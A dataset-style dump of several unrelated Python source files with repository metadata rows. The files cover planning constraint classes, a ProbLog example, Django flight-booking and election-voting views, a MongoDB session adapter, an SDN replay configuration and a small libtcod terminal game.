        # NOTE(review): the union frozenset is passed as ONE positional arg, so
        # __init__ stores it as a single element instead of flattening it —
        # likely should be Constraint(*(self.constraints | other.constraints)).
        # Left as-is pending the TODO above.
        return Constraint(self.constraints | other.constraints)

    def __hash__(self):
        return hash(self.constraints)

    def __eq__(self, other):
        return hash(self) == hash(other)

    def __str__(self):
        return "Constraint(%s)" % (", ".join(map(str, self.constraints)))

    __repr__ = __str__
class Contain(Constraint):
    """Constraint stating that `obj` lies inside `container`."""

    def __init__(self, container, obj):
        # Deliberately bypasses Constraint.__init__; stores endpoints directly.
        self.container = container
        self.obj = obj

    def __hash__(self):
        return hash((self.container, self.obj))

    def __str__(self):
        return f"{type(self).__name__}({self.obj} in {self.container})"


class Contact(Constraint):
    """Constraint stating that the given objects touch each other."""

    def __init__(self, *objects):
        # Stored as a frozenset: contact is symmetric and unordered.
        self.objects = frozenset(objects)

    def __hash__(self):
        return hash(self.objects)

    def __str__(self):
        return f"{type(self).__name__}({','.join(map(str, self.objects))})"
class ComposedAction(Action):
    """Several actions performed together (built via `Action.__add__`)."""

    def __init__(self, *actions):
        if not all(isinstance(a, Action) for a in actions):
            raise TypeError()
        self.actions = actions

    def __hash__(self):
        return hash(tuple(self.actions))

    def __str__(self):
        return "+(%s)" % ",".join(str(a) for a in self.actions)

    __repr__ = __str__


class NegatedAction(Action):
    """The logical negation of a single action."""

    def __init__(self, action):
        if not isinstance(action, Action):
            raise TypeError()
        self.action = action

    def __hash__(self):
        return hash(("not", self.action))

    def __str__(self):
        return "!(%s)" % self.action

    __repr__ = __str__
class Move(Action):
    """An object being moved to a destination in a given manner."""

    def __init__(self, obj, dest, manner):
        self.obj = obj
        self.dest = dest
        self.manner = manner

    def __hash__(self):
        return hash((self.obj, self.dest, self.manner))

    def __eq__(self, other):
        # Pure hash equality (no isinstance check, unlike Action.__eq__).
        return hash(other) == hash(self)

    def __str__(self):
        return f"{type(self).__name__}({self.obj} -> {self.dest}, {self.manner})"

    __repr__ = __str__


class Transfer(Move):
    """A Move that transfers possession; behaviour fully inherited."""


class Put(Action):
    """Placing `obj` somewhere during `event`, in a given manner."""

    def __init__(self, event, obj, manner):
        self.event = event
        self.obj = obj
        self.manner = manner

    def __hash__(self):
        return hash((self.event, self.obj, self.manner))

    def __str__(self):
        return f"{type(self).__name__}({self.event},{self.obj},{self.manner})"

    __repr__ = __str__
class Eat(Action):
    """Consuming `food` during `event`."""

    def __init__(self, event, food):
        self.event = event
        self.food = food

    def __hash__(self):
        return hash((self.event, self.food))

    def __str__(self):
        return f"{type(self).__name__}({self.food})"


class ActAndEntail(Action):
    """
    Joins an action with entailments about the event.
    """

    def __init__(self, action, entail):
        self.action = action
        self.entail = entail

    def __hash__(self):
        return hash((self.action, self.entail))


class StateChange(Action):
    """Marker base class for actions that alter world state."""


class CausePossession(StateChange):
    """Causing `agent` to come to possess `obj`."""

    def __init__(self, agent, obj):
        self.agent = agent
        self.obj = obj

    def __hash__(self):
        return hash((self.agent, self.obj))

    def __str__(self):
        return f"{type(self).__name__}({self.agent} <- {self.obj})"

    __repr__ = __str__
| [
"jon@gauthiers.net"
] | jon@gauthiers.net |
f7b5dd02dbf094465c47ff7b2ec320345c7b8abc | 053ae946aaae8c6e99beb1ed82486cbb0fadd6af | /theory/problog/ex-poisson.py | 8c960003d9828526d8f2aebbfe80120f27bdff05 | [] | no_license | pasqualedem/Graph-DB-Problog-Linker | 250fba3d12c635460d0e5bbe3e51286b4be1432d | e93d63c5dc3b0114c8080b28f1811051bea564e5 | refs/heads/master | 2022-04-05T05:13:38.600372 | 2020-02-17T16:53:55 | 2020-02-17T16:53:55 | 236,478,525 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 671 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Feb 12 17:03:58 2020
@author: PasqualeDeMarinis
"""
from problog import get_evaluatable
model = """
% urnball_poisson.pl
:- use_module('posson.py').
num_balls(X) :-
findall(N, between(1,3,N), L),
poisson_probs(L, 2, Probs),
select_weighted(0, Probs, L, X, _).
0.9::color(Ball, blue); 0.1::color(Ball, green).
draw_ball(D, C) :-
num_balls(TBs),
findall(Bs, between(1,TBs,Bs), L),
select_uniform(D, L, B, _),
color(B, C).
query(num_balls(_)).
evidence(draw_ball(0, green)).
query(draw_ball(1, green)).
"""
rappr = get_evaluatable().create_from(model)
r = rappr.evaluate()
print(r)
| [
"pasquale199876@hotmail.it"
] | pasquale199876@hotmail.it |
f5f865c9272a8c8739c77dd0d809040085eede11 | c0d31ed53b37085ca301c05ad579be90373de9ee | /fly/views.py | b0f9e573f7d2eb2638a8587cc1737fde6e0e955d | [] | no_license | likerberi/simpleDjango | cc34a62be1c1cd3aa7fb67ff1f81298461992347 | f95eacd4e276d55a5b754049597ff3f6930a4aed | refs/heads/master | 2020-05-28T09:56:50.309017 | 2019-05-30T06:56:20 | 2019-05-30T06:56:20 | 188,963,078 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,315 | py | from django.shortcuts import render
from django.http import HttpResponse, Http404, HttpResponseRedirect
from .models import Fly, Passenger
from django.urls import reverse
# Create your views here.
def index(request):
    """Render the landing page listing every flight."""
    return render(request, "fly/index.html", {"flys": Fly.objects.all()})
def fly(request, fly_id):
    """Show one flight, its passengers, and everyone not yet booked on it."""
    try:
        flight = Fly.objects.get(pk=fly_id)
    except Fly.DoesNotExist:
        raise Http404("Fly Does not exist.")
    return render(request, "fly/fly.html", {
        "fly": flight,
        "passengers": flight.passengers.all(),
        "non_passengers": Passenger.objects.exclude(flys=flight).all(),
    })
def book(request, fly_id):
    """Book the POSTed passenger onto flight `fly_id` and redirect back."""
    try:
        chosen_id = int(request.POST["passenger"])
        passenger = Passenger.objects.get(pk=chosen_id)
        flight = Fly.objects.get(pk=fly_id)
    except KeyError:
        # no passenger data
        return render(request, "fly/error.html", {"message": "No Selection."})
    except Fly.DoesNotExist:
        return render(request, "fly/error.html", {"message": "No flys"})
    except Passenger.DoesNotExist:
        return render(request, "fly/error.html", {"message": "No passengers."})
    passenger.flys.add(flight)
    return HttpResponseRedirect(reverse("fly", args=(fly_id,)))
| [
"likerberi97@gmail.com"
] | likerberi97@gmail.com |
da48bb5148055e48dab9afb47e713fa76d83c045 | 906bdc4eb499fa1551278ebef50c7f9b621bbdbe | /24/test_silver.py | 31f64d01618746cf8ad610cd75c71d2bcfaae20d | [] | no_license | slovb/advent_of_code_2017 | 042033047ed1c04f36faea4de747695b2c3e5c6e | 5389f79eeb5f880407e44337bec16d5287e3de4c | refs/heads/master | 2020-04-09T04:48:56.160875 | 2017-12-25T12:29:58 | 2017-12-25T12:29:58 | 160,037,767 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 394 | py | import unittest
import silver as target
class Tester(unittest.TestCase):
    """Checks silver.solve against the worked example from the puzzle text."""

    def test_ex(self):
        components = [
            (0, 2), (2, 2), (2, 3), (3, 4),
            (3, 5), (0, 1), (10, 1), (9, 10),
        ]
        self.assertEqual(target.solve(components), 31)


if __name__ == '__main__':
    unittest.main()
| [
"zlowbie@gmail.com"
] | zlowbie@gmail.com |
104c925bd6314e637d48b9ae42bec366a68dc578 | 077c91b9d5cb1a6a724da47067483c622ce64be6 | /snapshot_demo_updated_link_failure/interactive_replay_config.py | 8829a94407e3072b87c050c553795abd1f1be3a8 | [] | no_license | Spencerx/experiments | 0edd16398725f6fd9365ddbb1b773942e4878369 | aaa98b0f67b0d0c0c826b8a1565916bf97ae3179 | refs/heads/master | 2020-04-03T10:11:40.671606 | 2014-06-11T23:55:11 | 2014-06-11T23:55:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,044 | py |
from config.experiment_config_lib import ControllerConfig
from sts.topology import *
from sts.control_flow import InteractiveReplayer
from sts.simulation_state import SimulationConfig
from sts.input_traces.input_logger import InputLogger

# STS replay configuration: a 3-switch mesh driven by one POX controller
# (l2_multi forwarding with a synthetic link-failure crash), sockets
# multiplexed through the POX monkeypatcher.
simulation_config = SimulationConfig(controller_configs=[ControllerConfig(start_cmd='./pox.py --verbose openflow.discovery forwarding.l2_multi_synthetic_link_failure_crash sts.util.socket_mux.pox_monkeypatcher openflow.of_01 --address=__address__ --port=__port__', label='c1', address='127.0.0.1', cwd='pox')],
                                     topology_class=MeshTopology,
                                     topology_params="num_switches=3",
                                     patch_panel_class=BufferedPatchPanel,
                                     multiplex_sockets=True,
                                     kill_controllers_on_exit=True)

# Interactively replay the previously recorded event trace for this experiment.
control_flow = InteractiveReplayer(simulation_config, "experiments/snapshot_demo_updated_link_failure/events.trace")
# wait_on_deterministic_values=False
# delay_flow_mods=False
# Invariant check: 'InvariantChecker.check_liveness'
# Bug signature: ""
| [
"cs@cs.berkeley.edu"
] | cs@cs.berkeley.edu |
f8aa759652de4937cc1be1d4bf1ccaa8df8e77ee | d4dcdeac84a06abc6e94ccf053c22d9edf83f316 | /election/views.py | f5b7d08b89ab333ef75a8bd6a01dddf4f2ad8917 | [] | no_license | maliha3/Onlinevotingnew | 29b721a8ace5938b488d53dce406d6f5cc8f9a4b | af365e59e9741a7f5e6897710daf6244c4cab86c | refs/heads/master | 2023-05-31T02:02:14.604024 | 2021-06-14T17:53:30 | 2021-06-14T17:53:30 | 376,911,647 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,174 | py | import pandas as pd
from user import forms
from user.models import CanInfo, DummyCitizenInfo
from django.shortcuts import redirect, render
from django.contrib.auth.decorators import login_required
from .models import Election
from user.models import DummyCitizenInfo,CanInfo
from vote.models import Vote
from .forms import *
from django.db.models import Q
# Create your views here.
@login_required
def election(request, elecName):
    """Render one election's page and process votes / admin actions.

    GET: builds candidate lists relevant to the logged-in voter (filtered
    by area for national elections, by ward — plus the mayoral ward 'M' —
    for city elections) and the full admin candidate list with live vote
    counts.
    POST: handles admin status changes (activate / cancel / end) and
    ballot submission (MAYOR+COUNCILLOR+RESERVED for city, MP for
    national), then redirects by the user's role.
    """
    votearea = DummyCitizenInfo.objects.get(email = request.user.email)
    electionobj = Election.objects.get(elec_name=elecName)
    admincandidates = CanInfo.objects.filter(elec_name = elecName)
    if(electionobj.elec_type=='national'):
        candidates=CanInfo.objects.filter(elec_name = elecName, voting_area = votearea.area_name)
    else:
        # mayorcandidates=CanInfo.objects.filter(elec_name = elecName, candidate_type = 'MAYOR')
        candidates=CanInfo.objects.filter(Q(elec_name = elecName) & Q(voting_ward = votearea.ward_number)|Q(voting_ward = 'M'))
    print(admincandidates)
    # Parallel per-candidate lists; they are zipped together for the templates.
    canlistname = []
    canlistphoto = []
    candiparty = []
    canlisttype = []
    canlistnid = []
    counter = []
    canlistward =[]
    canlistarea = []
    admincanlistname = []
    admincanlistphoto = []
    admincandiparty = []
    admincanlisttype = []
    admincanlistnid = []
    admincounter = []
    admincanlistward =[]
    admincanlistarea = []
    for j in range(len(admincandidates)):
        dummyvar=DummyCitizenInfo.objects.get(nid = admincandidates[j].nid)
        admincanlistname.append(dummyvar.name)
        admincanlistphoto.append(dummyvar.picture)
        admincanlisttype.append(admincandidates[j].candidate_type)
        admincandiparty.append(admincandidates[j].party_name)
        admincanlistnid.append(admincandidates[j].nid)
        admincanlistward.append(admincandidates[j].voting_ward)
        admincanlistarea.append(admincandidates[j].voting_area)
        admincounter.append(Vote.objects.filter(elec_name=elecName,candidate=admincandidates[j]).count())
    for i in range(len(candidates)):
        dummyvar=DummyCitizenInfo.objects.get(nid = candidates[i].nid)
        canlistname.append(dummyvar.name)
        canlistphoto.append(dummyvar.picture)
        canlisttype.append(candidates[i].candidate_type)
        candiparty.append(candidates[i].party_name)
        canlistnid.append(candidates[i].nid)
        canlistward.append(candidates[i].voting_ward)
        canlistarea.append(candidates[i].voting_area)
        counter.append(Vote.objects.filter(elec_name=elecName,candidate=candidates[i]).count())
    print(canlistname)
    # Non-empty queryset when this user has already voted in this election.
    flag = Vote.objects.filter(elec_name=elecName, user=DummyCitizenInfo.objects.get(email=request.user.email), vote_status= True)
    context = {
        'uData' : DummyCitizenInfo.objects.get(email = request.user.email),
        'getElectionData': CanInfo.objects.filter(elec_name = elecName),
        'electionTable' : Election.objects.get(elec_name = elecName),
        'elec_name' : elecName,
        'admincanlistcity' : zip(admincanlistname,admincanlisttype,admincanlistward,admincounter),
        'admincanlistnational' : zip(admincanlistname,admincandiparty,admincanlistarea,admincounter),
        'canlist' : zip(canlistname,canlistphoto,canlisttype,candiparty,canlistnid),
        'canlist1' : zip(canlistname,canlistphoto,canlisttype,candiparty,canlistnid),
        'canlist2' : zip(canlistname,canlistphoto,canlisttype,candiparty,canlistnid),
        'canlist3' : zip(canlistname,canlisttype,canlistward,counter),
        'nationalcanlist' : zip(canlistname,candiparty,canlistarea,counter),
        'voteFlag' : flag,
        'votearea' : votearea
    }
    if request.method == 'POST':
        et = Election.objects.get(elec_name = elecName)
        # Admin actions: activate, cancel (delete election + candidates), end.
        if request.POST.get('actionOp') == 'active':
            et.elec_status = request.POST.get('actionOp')
            et.save()
        if request.POST.get('actionOp') == 'cancle':
            Election.objects.get(elec_name = elecName).delete()
            CanInfo.objects.filter(elec_name = elecName).delete()
        if request.POST.get('actionOp') == 'ended':
            et.elec_status = 'ended'
            et.save()
        # City ballot: all three posts must be selected at once.
        if request.POST.get('MAYOR') and request.POST.get('COUNCILLOR') and request.POST.get('RESERVED'):
            vModel1 = Vote(elec_name=elecName, vote_status= True, user=DummyCitizenInfo.objects.get(email=request.user.email), candidate = CanInfo.objects.filter(candidate_type='MAYOR').get(nid=request.POST.get('MAYOR')))
            vModel2 = Vote(elec_name=elecName, vote_status= True, user=DummyCitizenInfo.objects.get(email=request.user.email), candidate = CanInfo.objects.filter(candidate_type='COUNCILLOR').get(nid=request.POST.get('COUNCILLOR')))
            vModel3 = Vote(elec_name=elecName, vote_status= True, user=DummyCitizenInfo.objects.get(email=request.user.email), candidate = CanInfo.objects.filter(candidate_type='RESERVED').get(nid=request.POST.get('RESERVED')))
            vModel1.save()
            vModel2.save()
            vModel3.save()
        # National ballot: a single MP choice.
        if request.POST.get('MP'):
            vModel1 = Vote(elec_name=elecName, vote_status= True, user=DummyCitizenInfo.objects.get(email=request.user.email), candidate = CanInfo.objects.filter(candidate_type='MP',elec_name=elecName).get(nid=request.POST.get('MP')))
            vModel1.save()
        checkAccess = DummyCitizenInfo.objects.get(email=request.user.email)
        if checkAccess.elec_Worker == True:
            return redirect('election-worker')
        else:
            return redirect('dashboard')
    elif Election.objects.filter(elec_name = elecName, elec_type = 'national'):
        return render(request, 'home/national.html', context)
    elif Election.objects.filter(elec_name = elecName, elec_type = 'city'):
        return render(request, 'home/city.html', context)
@login_required
def electionWorker(request):
    """Election-worker dashboard: list elections and create new ones.

    A POST carrying a CSV upload creates one CanInfo row per CSV line plus
    a new Election row; national CSVs carry party/area columns, city CSVs
    carry a ward column.
    """
    context = {
        "pElectionList" : Election.objects.filter(elec_status='pending'),
        "aElectionList" : Election.objects.filter(elec_status='active'),
        "userInfo" : DummyCitizenInfo.objects.get(email=request.user.email),
        "clec_createForm" : createElectionForm(),
    }
    if request.method == 'POST':
        if len(request.FILES) !=0:
            df = pd.read_csv(request.FILES['cvc_file'])
            if request.POST.get('elec_type') == 'national':
                # One candidate per CSV row (national schema).
                for i in range(len(df)):
                    can = CanInfo(
                        name= df['name'][i],
                        nid = df['nid'][i],
                        elec_name=request.POST.get('elec_name'),
                        candidate_type=df['candidate_type'][i],
                        party_name = df['party_name'][i],
                        voting_area = df['Area Name'][i],
                    )
                    can.save()
                elect = Election(
                    elec_name = request.POST.get('elec_name'),
                    elec_type = request.POST.get('elec_type')
                )
                elect.save()
            else:
                # One candidate per CSV row (city schema: ward instead of party/area).
                for i in range(len(df)):
                    can = CanInfo(
                        name= df['name'][i],
                        nid = df['nid'][i],
                        elec_name=request.POST.get('elec_name'),
                        candidate_type=df['candidate_type'][i],
                        voting_ward = df['Ward Number'][i],
                    )
                    can.save()
                elect = Election(
                    elec_name = request.POST.get('elec_name'),
                    elec_type = request.POST.get('elec_type')
                )
                elect.save()
        return redirect('election-worker')
    return render(request, 'home/elec-worker.html', context)
def aricves(request):
    """Archive page: every election whose status is 'ended'."""
    ended = Election.objects.filter(elec_status='ended')
    return render(request, 'home/arcives.html', {'eAcrives': ended})
def publicResult(request, elecName):
    """Public (no login required) results page for an election.

    Builds the same per-candidate parallel lists as `election`, but with
    no voter-specific filtering, and renders the archive results template.
    """
    electionobj = Election.objects.get(elec_name=elecName)
    candidates=CanInfo.objects.filter(elec_name = elecName)
    # Parallel per-candidate lists, zipped together for the template.
    canlistname = []
    canlistphoto = []
    candiparty = []
    canlisttype = []
    canlistnid = []
    counter = []
    canlistward =[]
    canlistarea = []
    for i in range(len(candidates)):
        dummyvar=DummyCitizenInfo.objects.get(nid = candidates[i].nid)
        canlistname.append(dummyvar.name)
        canlistphoto.append(dummyvar.picture)
        canlisttype.append(candidates[i].candidate_type)
        candiparty.append(candidates[i].party_name)
        canlistnid.append(candidates[i].nid)
        canlistward.append(candidates[i].voting_ward)
        canlistarea.append(candidates[i].voting_area)
        counter.append(Vote.objects.filter(elec_name=elecName,candidate=candidates[i]).count())
    #flag = Vote.objects.filter(elec_name=elecName, user=DummyCitizenInfo.objects.get(email=request.user.email), vote_status= True)
    context = {
        #'uData' : DummyCitizenInfo.objects.get(email = request.user.email),
        'getElectionData': CanInfo.objects.filter(elec_name = elecName),
        'electionTable' : Election.objects.get(elec_name = elecName),
        'elec_name' : elecName,
        'canlist' : zip(canlistname,canlistphoto,canlisttype,candiparty,canlistnid),
        'canlist1' : zip(canlistname,canlistphoto,canlisttype,candiparty,canlistnid),
        'canlist2' : zip(canlistname,canlistphoto,canlisttype,candiparty,canlistnid),
        'canlist3' : zip(canlistname,canlisttype,canlistward,counter),
        'nationalcanlist' : zip(canlistname,candiparty,canlistarea,counter),
    }
    # The template shows the national-style table when this flag is present.
    if Election.objects.filter(elec_name = elecName, elec_type = 'national'):
        context['nTable'] = True
    return render(request, 'home/arciverus.html', context)
"malihazaman@Malihas-MacBook-Pro.local"
] | malihazaman@Malihas-MacBook-Pro.local |
37546155301527fa3625423441749a7d2847e9f0 | 6a89644ca479e1980b88c768bf868a1422fdee8b | /poptimizer/data/adapters/db.py | 0535645631c3afb07276e3d0291c9c74ede11c70 | [
"Unlicense"
] | permissive | chekanskiy/poptimizer | 82e664c2208b54cac63e0c5dac0680ec038da702 | e5d0f2c28de25568e4515b63aaad4aa337e2e522 | refs/heads/master | 2022-12-20T15:09:40.111678 | 2020-10-06T17:11:49 | 2020-10-06T17:11:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,381 | py | """Реализации сессий доступа к базе данных."""
import asyncio
from typing import Iterable, Optional, Tuple, Union
import pandas as pd
from motor import motor_asyncio
from poptimizer.data.adapters import logger
from poptimizer.data.ports import outer
# Collection that stores one-off (singleton) records
MISC = "misc"


def _collection_and_name(table_name: Union[outer.TableTuple, outer.TableName]) -> Tuple[str, str]:
    """Work out the MongoDB collection and document name for a table.

    A table whose name coincides with its group is a singleton and is
    stored in the shared MISC collection instead of a per-group one.
    """
    doc_name = table_name.name
    collection: str = table_name.group
    if collection == doc_name:
        collection = MISC
    return collection, doc_name
class MongoDBSession(outer.AbstractDBSession):
    """Session implementation backed by MongoDB.

    When a table's id and group coincide the data is written to a special
    collection; otherwise it goes to the collection of the table's group.
    """

    def __init__(self, db: motor_asyncio.AsyncIOMotorDatabase) -> None:
        """Stores a reference to the database."""
        self._logger = logger.AsyncLogger(self.__class__.__name__)
        self._db = db

    async def get(self, table_name: outer.TableName) -> Optional[outer.TableTuple]:
        """Fetches a document from its collection."""
        collection, name = _collection_and_name(table_name)
        doc = await self._db[collection].find_one({"_id": name})
        if doc is None:
            return None
        # The document stores the DataFrame in pandas "split" orientation.
        df = pd.DataFrame(**doc["data"])
        return outer.TableTuple(*table_name, df=df, timestamp=doc["timestamp"])

    async def commit(self, tables_vars: Iterable[outer.TableTuple]) -> None:
        """Writes the tables to MongoDB."""
        aws = []
        for table in tables_vars:
            collection, name = _collection_and_name(table)
            # Log message text is intentionally left untranslated (runtime string).
            self._logger.info(f"Сохранение {collection}.{name}")
            # Upsert the whole document keyed by the table name.
            aw_update = self._db[collection].replace_one(
                filter={"_id": name},
                replacement=dict(_id=name, data=table.df.to_dict("split"), timestamp=table.timestamp),
                upsert=True,
            )
            aws.append(aw_update)
        # Run all replace operations concurrently.
        await asyncio.gather(*aws)
| [
"wlmike@gmail.com"
] | wlmike@gmail.com |
a5708d9753024ed899407f0318b9ef2849457e9e | b6c536f0bc006697edb70306f0bb16d8f0d96e72 | /test.py | 15f6650d857911025e124ef5f61ed41cf74cc671 | [] | no_license | StevenOrn/my_first_game | e03e879895ffa8a05402a8fbe8714df2e786f61f | 3ea85e0c656a543619fec0a3512df80275f0bdbb | refs/heads/master | 2020-03-21T08:26:36.852606 | 2018-07-02T23:21:35 | 2018-07-02T23:21:35 | 138,343,795 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,130 | py | import libtcodpy as libtcod
from random import randint
import math
#actual size of the window
SCREEN_WIDTH = 90
SCREEN_HEIGHT = 100
#size of the map
MAP_WIDTH = 90
MAP_HEIGHT = 90
LIMIT_FPS = 10 #Game speed
#intialize score
score = 0
color_dark_wall = libtcod.Color(0, 0, 100)
color_dark_ground = libtcod.Color(50, 50, 150)
class Tile:
    """A single map cell: `blocked` stops movement, `block_sight` stops vision."""

    def __init__(self, blocked, block_sight=None):
        self.blocked = blocked
        # Unless told otherwise, an impassable tile is also opaque.
        self.block_sight = blocked if block_sight is None else block_sight
class Object:
    """A drawable game entity: the player, an enemy '@', or a bullet '*'.

    Tracks grid position, per-frame velocity `direction`, hit points, and
    hostility; colour reflects remaining hp (3=green, 2=yellow, 1=red).
    Relies on the module globals `map`, `objects`, `score`, and `con`.
    """
    #this is a generic object: the player, a monster, an item, the stairs...
    #it's always represented by a character on screen.
    def __init__(self, x, y, char ,direction =(0,0),hp=1,hostile=False):
        self.x = x
        self.y = y
        self.char = char
        self.direction = direction
        self.hp = hp
        # Kill reward equals the spawn hp.
        self.points = hp
        self.hostile = hostile
        self.player = False
        self.update_color()
    def isplayer(self):
        # Marks this object as the player (changes check_hp behaviour).
        self.player = True
    def update_color(self):
        # NOTE(review): raises KeyError for hp outside 1..3 — spawn code keeps
        # hp in that range; confirm before reusing elsewhere.
        colors_dict = {3:libtcod.green,2:libtcod.yellow,1:libtcod.red}
        self.color = colors_dict[self.hp]
    def move(self, dx, dy):
        #move by the given amount, if the destination is not blocked
        # Returns True when the destination tile is blocked (move refused).
        if map[self.x + dx][self.y + dy].blocked:
            return True
        else:
            self.x += dx
            self.y += dy
            return False
    def objects_collide(self,other):
        # Hostiles never collide with each other; otherwise same-cell = hit.
        if (self.hostile and other.hostile):
            return False
        elif (self.x == other.x and self.y == other.y):
            return True
        else:
            return False
    def check_hp(self):
        # Despawns the object at 0 hp; updates score / triggers game over.
        if (self.hp <= 0):
            global score
            #self.clear()
            self.char = ' '
            objects.remove(self)
            if self.player:
                gameover()
            elif self.hostile:
                score+= self.points
        else:
            self.update_color()
    def draw(self):
        #set the color and then draw the character that represents this object at its position
        libtcod.console_set_default_foreground(con, self.color)
        libtcod.console_put_char(con, int(self.x), int(self.y), self.char, libtcod.BKGND_NONE)
    def clear(self):
        #erase the character that represents this object
        libtcod.console_put_char(con, int(self.x), int(self.y), ' ', libtcod.BKGND_NONE)
def make_map(endgame=False):
    """(Re)build the global tile grid with solid walls on the border.

    With `endgame` True every tile starts blocked, freezing all movement.
    """
    global map
    map = [[Tile(endgame) for _ in range(MAP_HEIGHT)] for _ in range(MAP_WIDTH)]
    # Wall off the left/right edges...
    for y in range(MAP_HEIGHT):
        map[0][y].blocked = True
        map[MAP_WIDTH - 1][y].blocked = True
    # ...and the top/bottom edges.
    for x in range(MAP_WIDTH):
        map[x][0].blocked = True
        map[x][MAP_HEIGHT - 1].blocked = True
def render_all():
    """Advance every object one step, draw the frame, and blit it.

    Fix: iterate over a snapshot of `objects`.  The original removed
    entries from `objects` while iterating it directly, which makes a
    Python list iterator skip the element following each removal
    (objects missed their move/collision for that frame).
    """
    global color_light_wall
    global color_light_ground
    render_score()
    # Paint the tile backgrounds: walls vs. floor.
    for y in range(MAP_HEIGHT):
        for x in range(MAP_WIDTH):
            if map[x][y].blocked:
                libtcod.console_set_char_background(con, x, y, color_dark_wall, libtcod.BKGND_SET )
            else:
                libtcod.console_set_char_background(con, x, y, color_dark_ground, libtcod.BKGND_SET )
    # Snapshot so removals (wall hits here, kills inside check_collide)
    # cannot disturb the iteration.
    for obj in list(objects):
        if obj not in objects:
            continue  # already destroyed by an earlier collision this frame
        if obj.move(*obj.direction):
            # move() returns True when the target tile is blocked: despawn.
            objects.remove(obj)
        else:
            check_collide(obj)
            obj.draw()
    # Blit the off-screen console to the root console.
    libtcod.console_blit(con, 0, 0, SCREEN_WIDTH, SCREEN_HEIGHT, 0, 0, 0)
def handle_keys():
    """Poll the keyboard; returns True when the player wants to quit."""
    key = libtcod.console_check_for_keypress()  # real-time
    # key = libtcod.console_wait_for_keypress(True)  # turn-based
    if key.vk == libtcod.KEY_ENTER and key.lalt:
        # Alt+Enter: toggle fullscreen
        libtcod.console_set_fullscreen(not libtcod.console_is_fullscreen())
    elif key.vk == libtcod.KEY_ESCAPE:
        return True  # exit game
    if libtcod.console_is_key_pressed(libtcod.KEY_SPACE):
        shoot()
    # First pressed arrow wins; the glyph doubles as the facing direction.
    arrows = (
        (libtcod.KEY_UP, 0, -1, '^'),
        (libtcod.KEY_DOWN, 0, 1, 'v'),
        (libtcod.KEY_LEFT, -1, 0, '<'),
        (libtcod.KEY_RIGHT, 1, 0, '>'),
    )
    for vk, dx, dy, glyph in arrows:
        if libtcod.console_is_key_pressed(vk):
            player.move(dx, dy)
            player.char = glyph
            break
def shoot():
    """Spawn a bullet travelling the way the player faces."""
    headings = {'^': (0, -1), 'v': (0, 1), '<': (-1, 0), '>': (1, 0)}
    direction = headings[player.char]
    bullet = Object(player.x, player.y, '*', direction)
    # Start the bullet two tiles clear of the player so it cannot hit them.
    bullet.move(*direction)
    bullet.move(*direction)
    objects.append(bullet)
def create_enemy():
    """Spawn an '@' enemy at a random interior spot with random drift and 1-3 hp."""
    drift = (randint(-1, 1), randint(-1, 1))
    hp = randint(1, 3)
    x = randint(10, MAP_WIDTH - 10)
    y = randint(10, MAP_HEIGHT - 10)
    objects.append(Object(x, y, '@', drift, hp, True))
def check_collide(object):
    """Damage both parties of any collision involving `object`.

    Fix: iterate over a snapshot of `objects` — check_hp() removes dead
    entries from the global `objects` list, and removing from a list
    while iterating it directly makes the loop skip elements.
    """
    for other in list(objects):
        if object.objects_collide(other) and object != other:
            # Both parties take one point of damage; check_hp despawns at 0.
            object.hp -= 1
            other.hp -= 1
            object.check_hp()
            other.check_hp()
def gameover():
    """End the game: rebuild the map fully blocked so nothing can move."""
    make_map(True)
def render_score():
    """Draw the current score centred in the strip below the map."""
    global score
    libtcod.console_print(con, int(MAP_WIDTH/2), int(SCREEN_HEIGHT-(SCREEN_HEIGHT - MAP_HEIGHT)/2), str(score))
#############################################
# Initialization & Main Loop
#############################################
libtcod.console_set_custom_font('arial10x10.png', libtcod.FONT_TYPE_GREYSCALE | libtcod.FONT_LAYOUT_TCOD)
libtcod.console_init_root(SCREEN_WIDTH, SCREEN_HEIGHT, 'test tutorial', False)
libtcod.sys_set_fps(LIMIT_FPS)
con = libtcod.console_new(SCREEN_WIDTH, SCREEN_HEIGHT)
#intialize score
# score = 1
#create object representing the player
player = Object(int(SCREEN_WIDTH/2), int(SCREEN_HEIGHT/2), '^')
player.isplayer()
#the list of objects with those two
objects = [player]
#generate map (at this point it's not drawn to the screen)
make_map()
# Frame loop: maybe spawn an enemy, render, flush, clear old glyphs, then
# process input; Escape breaks out and ends the game.
while not libtcod.console_is_window_closed():
    #spawn rate
    if randint(1,100) <= 10:
        create_enemy()
    #render the screen
    render_all()
    libtcod.console_flush()
    #erase all objects at their old locations, before they move
    for object in objects:
        object.clear()
    #handle keys and exit game if needed
    exit = handle_keys()
    if exit:
        break
"stevenorn@aol.com"
] | stevenorn@aol.com |
f9fbf68b0154bfbe4fd456acd69ec3818da9b88d | 87ed932190c4934cffb04ffb77963cb4d831ca3b | /app.py | 83f1758f5dbc480892ccf417a84b5b0749f36a15 | [] | no_license | zchase/deployPython | 2cab4068f5e5cc4c9fff16a74ea19e775f5461ce | cdef059d0328f2f02524e333c571d3317f974ba9 | refs/heads/master | 2021-01-10T00:57:39.443858 | 2015-12-30T21:24:43 | 2015-12-30T21:24:43 | 48,819,992 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 601 | py | #!/usr/bin/env python
from flask import Flask
import sys
import optparse
import time
app = Flask(__name__)
start = int(round(time.time()))
@app.route("/")
def hello_world():
return "Hello World!"
if __name__ == '__main__':
parser = optparse.OptionParser(usage="python simpleapp.py -p <port>")
parser.add_option('-p', '--port', action='store', dest='port', help='The port to listen on.')
(args, _) = parser.parse_args()
if args.port == None:
print "Missing required argument: -p/--port"
sys.exit(1)
app.run(host='0.0.0.0', port=int(args.port), debug=False) | [
"zack@distelli.com"
] | zack@distelli.com |
22cb1afffa9f329ebfcbe75c0c93d8c82eaccab7 | f13acd0d707ea9ab0d2f2f010717b35adcee142f | /ABC/abc251-abc300/abc291/a/main.py | 271121f05c994fc6965d9d50bef5b54640e06764 | [
"CC0-1.0",
"LicenseRef-scancode-public-domain"
